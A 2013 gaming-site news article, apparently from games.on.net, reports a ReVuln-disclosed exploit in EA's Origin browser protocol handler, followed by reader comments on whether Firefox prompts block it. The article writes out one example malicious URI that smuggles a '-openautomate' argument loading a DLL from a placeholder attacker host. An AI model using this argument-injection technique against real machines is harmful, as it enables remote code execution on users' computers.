Origin browser exploit demonstrated, possibility of malicious software execution

Ha ha ha I love these stupid images

By on March 19, 2013 at 1:30 pm

Origin users are being warned that an exploit exists which could allow programs to use Origin to execute malicious code on your computer. The exploit, which works in much the same manner as a similar one spotted in Steam in October, would allow a hacker to use a web browser to force-open Origin and make it run unwanted code.

The exploit would change the command from normal syntax, such as origin://LaunchGame/[GameID], to something closer to origin://LaunchGame/[GameID]?CommandParams= -openautomate ATTACKER_IPevil.dll.

Security firm ReVuln, who also discovered the Steam exploit, have released a paper on the hack, as well as a video demonstration.

EA have sent a comment to Ars Technica to say “Our team is constantly investigating hypotheticals like this one as we continually update our security infrastructure.”

Source: Ars Technica

Tags: ,
5 comments (Leave your own)

I wonder if its related to the Patching that origin just did now

 

Yeah I noticed a patch this morning too. Checked the changelog and nothing relating to this showed up in the latest release.

 

So… only thing I can see in Firefox under applications is ‘origin’ content type, which is already set to ‘always ask’. Pretty sure I’ve never touched the setting for it, so by default Firefox isn’t really vulnerable to this? Unless you click ‘yes’ to a completely uncalled for origin launch, of course.

edit – yeah, pasting any kind of origin:// command into the url bar results in a prompt… false alarm

 

ooshp,

Only if you use Firefox (maybe others) and only if you are one of the people that doesn’t click ‘Always do this’. You’d be surprised at the amount of people that click the ‘Always Open, don’t ask again’ buttons.

 

Is this new DLC from EA…..??? I luv EA

 
Leave a comment

You can use the following bbCode
[i], [b], [img], [quote], [url href="http://www.google.com/"]Google[/url]

Leave a Reply

PC Gaming Calendar 2014

Follow Games.on.net

Steam Group

Upcoming Games

Releasing Soon
Thief Shadowrun Returns South Park: The Stick of Truth

Community Soapbox

Recent Features
Watch Dogs

Watch Dogs PC hands-on: Not the perfect open world, but still a world of fun

Watch Dogs offers a generous array of options, and we push the boundaries to see how far we can go.

heroes_of_the_storm

Heroes of the Storm: Blizzard’s Dustin Browder on rage problems, hybrid roles, and balance

"We’re trying to make it so if there’s something obvious that you want to do, it’s the right thing to do. There’s no sort of hidden rules or hidden strategies that make that wrong."

ArcheAge

ArcheAge’s alpha impressions: The freeform Korean MMO that might just live up to its promises

This high-flying Korean MMO has finally made it to a Western release. James jumps in to see if the promise 'sandpark' model delivers.

Reaper of Souls

Diablo 3: Reaper of Souls reviewed: Change is a good thing

Blizzard shows that it isn't afraid to change everything

Titanfall

Titanfall: Crush your enemies under your robotic foot with these gameplay tips

Wallrunning speed boosts, room clearing strategies, and more inside.

Streaming Radio
Radio Streams are restricted to iiNet group customers.

GreenManGaming MREC

The Regulars
guns_2

Sitrep: Hating Guns and Totally Loving Playing With Guns

Toby's absent-minded shower thoughts arrive for your edification.

The Secret World

Legal Opinion: Bait and switch… with a mankini

Not everybody is laughing following Funcom's April Fools joke on its players.

Bad at Aiming

Sitrep: Waiting in line at the FPS dole queue

Toby is so incompetent that he needs an entire new genre of games invented just to cater for him.

Amazon Fire

Friday Tech Roundup (04 April 2014): Radeon R9 295X2 specs leak

Also, the man behind the "Microsoft" phone scam has been captured and fined.

Facebook Like Box